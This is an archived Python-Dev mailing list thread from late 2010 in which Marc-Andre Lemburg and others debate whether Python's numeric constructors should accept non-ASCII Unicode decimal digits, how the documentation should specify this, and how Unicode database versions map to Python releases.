...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ Numbers in various scripts,, ,, Arabic,Thai,Dzongkha 1,à¹,༡ 2,à¹,༢ 3,à¹,༣ 4,à¹,༤ 5,à¹,༥ 6,à¹,༦ 7,à¹,༧ 8,à¹,༨ 9,à¹,༩ 10,à¹à¹,༡༠11,à¹à¹,༡༡ 12,à¹à¹,༡༢ 13,à¹à¹,༡༣ 14,à¹à¹,༡༤ 15,à¹à¹,༡༥ 16,à¹à¹,༡༦ 17,à¹à¹,༡༧ 18,à¹à¹,༡༨ 19,à¹à¹,༡༩ 20,à¹à¹,༢༠___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Martin v. Löwis wrote: Now, one may wonder what precisely a possibly signed floating point number is, but most likely, this refers to floatnumber ::= pointfloat | exponentfloat pointfloat::= [intpart] fraction | intpart . exponentfloat ::= (intpart | pointfloat) exponent intpart ::= digit+ fraction ::= . digit+ exponent ::= (e | E) [+ | -] digit+ digit ::= 0...9 I don't see why the language spec should limit the wealth of number formats supported by float(). If it doesn't, there should be some other specification of what is correct and what is not. It must not be unspecified. True. It is not uncommon for Asians and other non-Latin script users to use their own native script symbols for numbers. Just because these digits may look strange to someone doesn't mean that they are meaningless or should be discarded. Then these users should speak up and indicate their need, or somebody should speak up and confirm that there are users who actually want '١٢٣٤.٥٦' to denote 1234.56. To my knowledge, there is no writing system in which '١٢٣٤.٥٦e4' means 12345600.0. I'm not sure what you're after here. Please also remember that Python3 now allows Unicode names for identifiers for much the same reasons. No no no. Addition of Unicode identifiers has a well-designed, deliberate specification, with a PEP and all. The support for non-ASCII digits in float appears to be ad-hoc, and not founded on actual needs of actual users. Please note that we didn't have PEPs and the PEP process at the time. The Unicode proposal predates and in some respects inspired the PEP process. The decision to add this support was deliberate based on the desire to support as much of the nice features of Unicode in Python as we could. At least that was what was driving me at the time. Regarding actual needs of actual users: I don't buy that as an argument when it comes to supporting a standard that is meant to attract users with non-ASCII origins. Some references you may want to read up on: http://en.wikipedia.org/wiki/Numbers_in_Chinese_culture http://en.wikipedia.org/wiki/Vietnamese_numerals http://en.wikipedia.org/wiki/Korean_numerals http://en.wikipedia.org/wiki/Japanese_numerals Even MS Office supports them: http://languages.siuc.edu/Chinese/Language_Settings.html Note that the support in float() (and the other numeric constructors) to work with Unicode code points was explicitly added when Unicode support was added to Python and has been available since Python 1.6. That doesn't necessarily make it useful. Alexander's complaint is that it makes Python unstable (i.e. changing as the UCD changes). If that were true, then all Unicode database (UCD) changes would make Python unstable. However, most changes to existing code points in the UCS are bug fixes, so they actually have a stabilizing quality more than a destabilizing one. It is not a bug by any definition of bug Most certainly it is: the documentation is either underspecified, or deviates from the implementation (when taking the most plausible interpretation). This is the very definition of bug. The implementation is not a bug and neither was this a bug in the 2.x series of the Python documentation. The Python 3.x docs apparently introduced a reference to the language spec which is clearly not capturing the wealth of possible inputs. So, yes, we're talking about a documentation bug, but not an implementation bug. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 29 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Martin v. Löwis wrote: [...] For direct entry by an interactive user, yes. Why are some people in this discussion thinking only of direct entry by an interactive user? Ultimately, somebody will have entered the data. I don't think you really believe that all data processed by a computer was eventually manually entered by a someone :-) I already gave you a couple of examples of how such data can end up being input for Python number constructors. If you are still curious, please see the Wikipedia pages I linked to, or have a look at these keyboards: http://en.wikipedia.org/wiki/File:KB_Arabic_MAC.svg http://en.wikipedia.org/wiki/File:Keyboard_Layout_Sanskrit.png http://en.wikipedia.org/wiki/File:800px-KB_Thai_Kedmanee.png http://en.wikipedia.org/wiki/File:Tibetan_Keyboard.png http://en.wikipedia.org/wiki/File:KBD-DZ-noshift-2009.png (all referenced on http://en.wikipedia.org/wiki/Keyboard_layout) and then compare these to: http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt Arabic numerals are being used a lot nowadays in Asian countries, but that doesn't mean that the native script versions are not being used anymore. Furthermore, data can well originate from texts that were written hundreds or even thousands of years ago, so there is plenty of material available for processing. Even if not entered directly, there are plenty of ways to convert Arabic numerals (or other numeral systems) to the above forms, e.g. in MS Office for Thai: http://office.microsoft.com/en-us/excel-help/convert-arabic-numbers-to-thai-text-format-HP003074364.aspx Anyway, as mentioned before: all this is really besides the point: If we want to support Unicode in Python, we have to also support conversion of numerals declared in Unicode into a form that can be processed by Python. Regardless of where such data originates. If we were not to follow this approach, we could just as well decide not support support reading Egyptian Hieroglyphs based on the argument that there's no keyboard to enter them... http://www.unicode.org/charts/PDF/U13000.pdf :-) (from http://www.unicode.org/charts/) Input from an existing text file, as I said earlier. Which *specific* existing text file? Have you actually *seen* such a text file? Have you tried Google ? http://www.google.com/search?q=١٢٣ http://www.google.com/search?q=٣+site%3Agov.lb Some examples: http://www.bdl.gov.lb/circ/intpdf/int123.pdf http://www.cdr.gov.lb/study/sdatl/Arabic/Chapter3.PDF http://www.batroun.gov.lb/PDF/Waredat2006.pdf (these all use http://en.wikipedia.org/wiki/Eastern_Arabic_numerals) Direct entry at the console is a red herring. And we don't need powerhouses because power comes out of the socket. Martin, the argument simply doesn't fit well with the discussion about Python and Unicode. We introduced Unicode in Python not because there was a need for each and every code point in Unicode, but because we wanted to adopt a standard which doesn't prefer any one way of writing things over another. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 02 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Eric Smith wrote: The current behavior should go nowhere; it is not useful. Something very similar to the current behavior (but done correctly) should go into the locale module. I agree with everything Martin says here. I think the basic premise is: you won't find strings in the wild that use non-ASCII digits but do use the ASCII dot as a decimal point. And that's what float() is looking for. (And that doesn't even begin to address what it expects for an exponent 'e'.) http://en.wikipedia.org/wiki/Decimal_mark In China, comma and space are used to mark digit groups because dot is used as decimal mark. Note that float() can also parse integers, it just returns them as floats :-) -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 02 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Thu, Dec 2, 2010 at 4:14 PM, M.-A. Lemburg m...@egenix.com wrote: .. Have you tried Google ? I tried google at I could not find any plain text or HTML file that would use Arabic-Indic numerals. What was interesting, though that a search for quran unicode (without quotes). Brought me to http://www.sacred-texts.com which says that they've been using unicode since 2002 in their archives. Interestingly enough, their version of Qur'an uses ordinary digits for ayah numbers. See, for example http://www.sacred-texts.com/isl/uq/050.htm. I will change my mind on this issue when you present a machine-readable file with Arabic-Indic numerals and a program capable of reading it and show that this program uses the same number parsing algorithm as Python's int() or float(). Have you had a look at the examples I posted ? They include texts and tables with numbers written using east asian arabic numerals. Here's an example of a a famous Chinese text using Chinese numerals: http://ctext.org/nine-chapters Unfortunately, the Chinese numerals are not listed in the Category Nd, so Python won't be able to parse them. This has various reasons, it seems, one of them being that the numeral code points were not defined as range of code points. I'm sure you can find other books on mathematics in sanscrit or arabic scripts as well. But this whole branch of the discussion is not going to go anywhere. The point is that we support all of Unicode in Python, not just a fragment, and therefore the numeric constructors support all of Unicode. Using them, it's very easy to support numbers in all kinds of variants, whether bound to a locale or not. Adding more locale aware numeric parsers and formatters to the locale module, based on these APIs is certainly a good idea, but orthogonal to the ongoing discussion, IMO. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 02 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Terry Reedy wrote: On 11/29/2010 10:19 AM, M.-A. Lemburg wrote: Nick Coghlan wrote: On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburgm...@egenix.com wrote: If we would go down that road, we would also have to disable other Unicode features based on locale, e.g. whether to apply non-ASCII case mappings, what to consider whitespace, etc. We don't do that for a good reason: Unicode is supposed to be universal and not limited to a single locale. Because parsing numbers is about more than just the characters used for the individual digits. There are additional semantics associated with digit ordering (for any number) and decimal separators and exponential notation (for floating point numbers) and those vary by locale. We deliberately chose to make the builtin numeric parsers unaware of all of those things, and assuming that we can simply parse other digits as if they were their ASCII equivalents and otherwise assume a C locale seems questionable. Sure, and those additional semantics are locale dependent, even between ASCII-only locales. However, that does not apply to the basic building blocks, the decimal digits themselves. If the existing semantics can be adequately defined, documented and defended, then retaining them would be fine. However, the language reference needs to define the behaviour properly so that other implementations know what they need to support and what can be chalked up as being just an implementation accident of CPython. (As a point in the plus column, both decimal.Decimal and fractions.Fraction were able to handle the '١٢٣٤.٥٦' example in a manner consistent with the int and float handling) The support is built into the C API, so there's not really much surprise there. Regarding documentation, we'd just have to add that numbers may be made up of an Unicode code point in the category Nd. See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section 4.6 for details Decimal digits form a large subcategory of numbers consisting of those digits that can be used to form decimal-radix numbers. They include script-specific digits, but exclude char- acters such as Roman numerals and Greek acrophonic numerals. (Note that1, 5 = 15 = fifteen, butI, V = IV = four.) Decimal digits also exclude the compatibility subscript or superscript digits to prevent simplistic parsers from misinterpreting their values in context. int(), float() and long() (in Python2) are such simplistic parsers. Since you are the knowledgable advocate of the current behavior, perhaps you could open an issue and propose a doc patch, even if not .rst formatted. Good suggestion. I tried to collect as much context as possible: http://bugs.python.org/issue10610 I'll leave the rst-magic to someone else, but will certainly help if you have more questions about the details. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 02 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Eric Smith wrote: On 12/2/2010 5:43 PM, M.-A. Lemburg wrote: Eric Smith wrote: The current behavior should go nowhere; it is not useful. Something very similar to the current behavior (but done correctly) should go into the locale module. I agree with everything Martin says here. I think the basic premise is: you won't find strings in the wild that use non-ASCII digits but do use the ASCII dot as a decimal point. And that's what float() is looking for. (And that doesn't even begin to address what it expects for an exponent 'e'.) http://en.wikipedia.org/wiki/Decimal_mark In China, comma and space are used to mark digit groups because dot is used as decimal mark. Is that an ASCII dot? That page doesn't say. Yes, but to be fair: I think that the page actually refers to the use of the Arabic numeral format in China, rather than with their own script symbols. Note that float() can also parse integers, it just returns them as floats :-) :) -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 02 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Terry Reedy wrote: On 11/30/2010 10:05 AM, Alexander Belopolsky wrote: My general answers to the questions you have raised are as follows: 1. Each new feature release should use the latest version of the UCD as of the first beta release (or perhaps a week or so before). New chars are new features and the beta period can be used to (hopefully) iron out any bugs introduced by a new UCD version. The UCD is versioned just like Python is, so if the Unicode Consortium decides to ship a 5.2.1 version of the UCD, we can add that to Python 2.7.x, since Python 2.7 started out with 5.2.0. 2. The language specification should not be UCD version specific. Martin pointed out that the definition of identifiers was intentionally written to not be, bu referring to 'current version' or some such. On the other hand, the UCD version used should be programatically discoverable, perhaps as an attribute of sys or str. It already is and has been for while, e.g. Python 2.5: import unicodedata unicodedata.unidata_version '4.1.0' 3.. The UCD should not change in bugfix releases. New chars are new features. Adding them in bugfix releases will introduce gratuitous imcompatibilities between releases. People who want the latest Unicode should either upgrade to the latest Python version or patch an older version (but not expect core support for any problems that creates). See above. Patch level revisions of the UCD are fine for patch level releases of Python, since those patch level revisions of the UCD fix bugs just like we do in Python. Note that each new UCD major.minor version is a new standard on its own, so it's perfectly ok to stick with one such standard version per Python version. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 01 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Martin v. Löwis wrote: Am 30.11.2010 21:24, schrieb Ben Finney: haiyang kang corn...@gmail.com writes: I think it is a little ugly to have code like this: num = float(一.一), expected result is: num = 1.1 That's a straw man, though. The string need not be a literal in the program; it can be input to the program. num = float(input_from_the_external_world) Does that change your assessment of whether non-ASCII digits are used? I think the OP (haiyang kang) already indicated that he finds it quite unlikely that anybody would possibly want to enter that. You would need a number of key strokes to enter each individual ideograph, plus you have to press the keys for keyboard layout switching to enter the Latin decimal separator (which you normally wouldn't use along with the Han numerals). That's a somewhat limited view, IMHO. Numbers are not always entered using a computer keyboard, you have tool like cash registries, special numeric keypads, scanners, OCR, etc. for external entry, and you also have other programs producing such output, e.g. MS Office if configured that way. The argument with the decimal point doesn't work well either, since it's obvious that float() and int() do not support localized input. E.g. in Germany we write 3,141 instead of 3.141: float('3,141') Traceback (most recent call last): File stdin, line 1, in module ValueError: invalid literal for float(): 3,141 No surprise there. The localization of the input data, e.g. removal of thousands separators and conversion of decimal marks to the dot, have to be done by the application, just like you have to now for German floating point number literals. The locale module already has locale.atof() and locale.atoi() for just this purpose. FYI, here's a list of decimal digits supported by Python 2.7: http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt: 0030..0039; Decimal # Nd [10] DIGIT ZERO..DIGIT NINE 0660..0669; Decimal # Nd [10] ARABIC-INDIC DIGIT ZERO..ARABIC-INDIC DIGIT NINE 06F0..06F9; Decimal # Nd [10] EXTENDED ARABIC-INDIC DIGIT ZERO..EXTENDED ARABIC-INDIC DIGIT NINE 07C0..07C9; Decimal # Nd [10] NKO DIGIT ZERO..NKO DIGIT NINE 0966..096F; Decimal # Nd [10] DEVANAGARI DIGIT ZERO..DEVANAGARI DIGIT NINE 09E6..09EF; Decimal # Nd [10] BENGALI DIGIT ZERO..BENGALI DIGIT NINE 0A66..0A6F; Decimal # Nd [10] GURMUKHI DIGIT ZERO..GURMUKHI DIGIT NINE 0AE6..0AEF; Decimal # Nd [10] GUJARATI DIGIT ZERO..GUJARATI DIGIT NINE 0B66..0B6F; Decimal # Nd [10] ORIYA DIGIT ZERO..ORIYA DIGIT NINE 0BE6..0BEF; Decimal # Nd [10] TAMIL DIGIT ZERO..TAMIL DIGIT NINE 0C66..0C6F; Decimal # Nd [10] TELUGU DIGIT ZERO..TELUGU DIGIT NINE 0CE6..0CEF; Decimal # Nd [10] KANNADA DIGIT ZERO..KANNADA DIGIT NINE 0D66..0D6F; Decimal # Nd [10] MALAYALAM DIGIT ZERO..MALAYALAM DIGIT NINE 0E50..0E59; Decimal # Nd [10] THAI DIGIT ZERO..THAI DIGIT NINE 0ED0..0ED9; Decimal # Nd [10] LAO DIGIT ZERO..LAO DIGIT NINE 0F20..0F29; Decimal # Nd [10] TIBETAN DIGIT ZERO..TIBETAN DIGIT NINE 1040..1049; Decimal # Nd [10] MYANMAR DIGIT ZERO..MYANMAR DIGIT NINE 1090..1099; Decimal # Nd [10] MYANMAR SHAN DIGIT ZERO..MYANMAR SHAN DIGIT NINE 17E0..17E9; Decimal # Nd [10] KHMER DIGIT ZERO..KHMER DIGIT NINE 1810..1819; Decimal # Nd [10] MONGOLIAN DIGIT ZERO..MONGOLIAN DIGIT NINE 1946..194F; Decimal # Nd [10] LIMBU DIGIT ZERO..LIMBU DIGIT NINE 19D0..19DA; Decimal # Nd [11] NEW TAI LUE DIGIT ZERO..NEW TAI LUE THAM DIGIT ONE 1A80..1A89; Decimal # Nd [10] TAI THAM HORA DIGIT ZERO..TAI THAM HORA DIGIT NINE 1A90..1A99; Decimal # Nd [10] TAI THAM THAM DIGIT ZERO..TAI THAM THAM DIGIT NINE 1B50..1B59; Decimal # Nd [10] BALINESE DIGIT ZERO..BALINESE DIGIT NINE 1BB0..1BB9; Decimal # Nd [10] SUNDANESE DIGIT ZERO..SUNDANESE DIGIT NINE 1C40..1C49; Decimal # Nd [10] LEPCHA DIGIT ZERO..LEPCHA DIGIT NINE 1C50..1C59; Decimal # Nd [10] OL CHIKI DIGIT ZERO..OL CHIKI DIGIT NINE A620..A629; Decimal # Nd [10] VAI DIGIT ZERO..VAI DIGIT NINE A8D0..A8D9; Decimal # Nd [10] SAURASHTRA DIGIT ZERO..SAURASHTRA DIGIT NINE A900..A909; Decimal # Nd [10] KAYAH LI DIGIT ZERO..KAYAH LI DIGIT NINE A9D0..A9D9; Decimal # Nd [10] JAVANESE DIGIT ZERO..JAVANESE DIGIT NINE AA50..AA59; Decimal # Nd [10] CHAM DIGIT ZERO..CHAM DIGIT NINE ABF0..ABF9; Decimal # Nd [10] MEETEI MAYEK DIGIT ZERO..MEETEI MAYEK DIGIT NINE FF10..FF19; Decimal # Nd [10] FULLWIDTH DIGIT ZERO..FULLWIDTH DIGIT NINE 104A0..104A9 ; Decimal # Nd [10] OSMANYA DIGIT ZERO..OSMANYA DIGIT NINE 1D7CE..1D7FF ; Decimal # Nd [50] MATHEMATICAL BOLD DIGIT ZERO..MATHEMATICAL MONOSPACE DIGIT NINE The Chinese and Japanese ideographs are not supported because of the way they are defined in the Unihan database. I'm currently investigating how we could support them as well. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source
Re: [Python-Dev] Python and the Unicode Character Database
Terry Reedy wrote: On 11/30/2010 3:23 AM, Stephen J. Turnbull wrote: I see no reason not to make a similar promise for numeric literals. I see no good reason to allow compatibility full-width Japanese ASCII numerals or Arabic cursive numerals in for i in range(...) for example. I do not think that anyone, at least not me, has argued for anything other than 0-9 digits (or 0-f for hex) in literals in program code. The only issue is whether non-programmer *users* should be able to use their native digits in applications in response to input prompts. Me neither. This is solely about Python being able to parse numeric input in the float(), int() and complex() constructors. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 01 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Sun, Nov 28, 2010 at 5:42 PM, M.-A. Lemburg m...@egenix.com wrote: .. I don't see why the language spec should limit the wealth of number formats supported by float(). The Language Spec (whatever it is) should not, but hopefully the Library Reference should. If you follow http://docs.python.org/dev/py3k/library/functions.html#float link and the references therein, you'll end up with ... the language spec again :-) digit ::= 0...9 http://docs.python.org/dev/py3k/reference/lexical_analysis.html#grammar-token-digit That's obviously a bug in the documentation, since the Python 2.7 docs don't mention any such relationship to the language spec: http://docs.python.org/library/functions.html#float -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 29 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Nick Coghlan wrote: On Mon, Nov 29, 2010 at 1:39 PM, Stephen J. Turnbull step...@xemacs.org wrote: I agree that Python should make it easy for the programmer to get numerical values of native numeric strings, but it's not at all clear to me that there is any point to having float() recognize them by default. Indeed, as someone else suggested earlier in the thread, supporting non-ASCII digits sounds more like a job for the locale module than for the builtin types. Deprecating non-ASCII support in the latter, while ensuring it is properly supported in the former sounds like a better way forward than maintaining the status quo (starting in 3.3 though, with the first beta just around the corner, we don't want to be monkeying with this in 3.2) Since when do we only support certain Unicode features in specific locales ? If we would go down that road, we would also have to disable other Unicode features based on locale, e.g. whether to apply non-ASCII case mappings, what to consider whitespace, etc. We don't do that for a good reason: Unicode is supposed to be universal and not limited to a single locale. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 29 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Nick Coghlan wrote: On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburg m...@egenix.com wrote: If we would go down that road, we would also have to disable other Unicode features based on locale, e.g. whether to apply non-ASCII case mappings, what to consider whitespace, etc. We don't do that for a good reason: Unicode is supposed to be universal and not limited to a single locale. Because parsing numbers is about more than just the characters used for the individual digits. There are additional semantics associated with digit ordering (for any number) and decimal separators and exponential notation (for floating point numbers) and those vary by locale. We deliberately chose to make the builtin numeric parsers unaware of all of those things, and assuming that we can simply parse other digits as if they were their ASCII equivalents and otherwise assume a C locale seems questionable. Sure, and those additional semantics are locale dependent, even between ASCII-only locales. However, that does not apply to the basic building blocks, the decimal digits themselves. If the existing semantics can be adequately defined, documented and defended, then retaining them would be fine. However, the language reference needs to define the behaviour properly so that other implementations know what they need to support and what can be chalked up as being just an implementation accident of CPython. (As a point in the plus column, both decimal.Decimal and fractions.Fraction were able to handle the '١٢٣٤.٥٦' example in a manner consistent with the int and float handling) The support is built into the C API, so there's not really much surprise there. Regarding documentation, we'd just have to add that numbers may be made up of an Unicode code point in the category Nd. See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section 4.6 for details Decimal digits form a large subcategory of numbers consisting of those digits that can be used to form decimal-radix numbers. They include script-specific digits, but exclude char- acters such as Roman numerals and Greek acrophonic numerals. (Note that 1, 5 = 15 = fifteen, but I, V = IV = four.) Decimal digits also exclude the compatibility subscript or superscript digits to prevent simplistic parsers from misinterpreting their values in context. int(), float() and long() (in Python2) are such simplistic parsers. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 29 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Mon, Nov 29, 2010 at 2:22 AM, Martin v. Löwis mar...@v.loewis.de wrote: The former ensures that literals in code are always readable; the later allows users to enter numbers in their own number system. How could that be a bad thing? It's YAGNI, feature bloat. It gives the illusion of supporting something that actually isn't supported very well (namely, parsing local number strings). I claim that there is no meaningful application of this feature. This is not about parsing local number strings, it's about parsing number strings represented using different scripts - besides en-US is a locale as well, ye know :-) Speaking of YAGNI, does anyone want to defend complex('١٢٣٤.٥٦j') 1234.56j ? Yes. The same arguments apply. Just because ASCII-proponents may have a hard time reading such literals, doesn't mean that script users have the same trouble. Especially given that we reject complex('1234.56i'): http://bugs.python.org/issue10562 We've had that discussion long before we had Unicode in Python. The main reason was that 'i' looked to similar to 1 in a number of fonts which is why it was rejected for Python source code. However, I don't any reason why we shouldn't accept both i and j for complex(), though, since the input to that constructor doesn't have to originate in Python source code. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 29 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
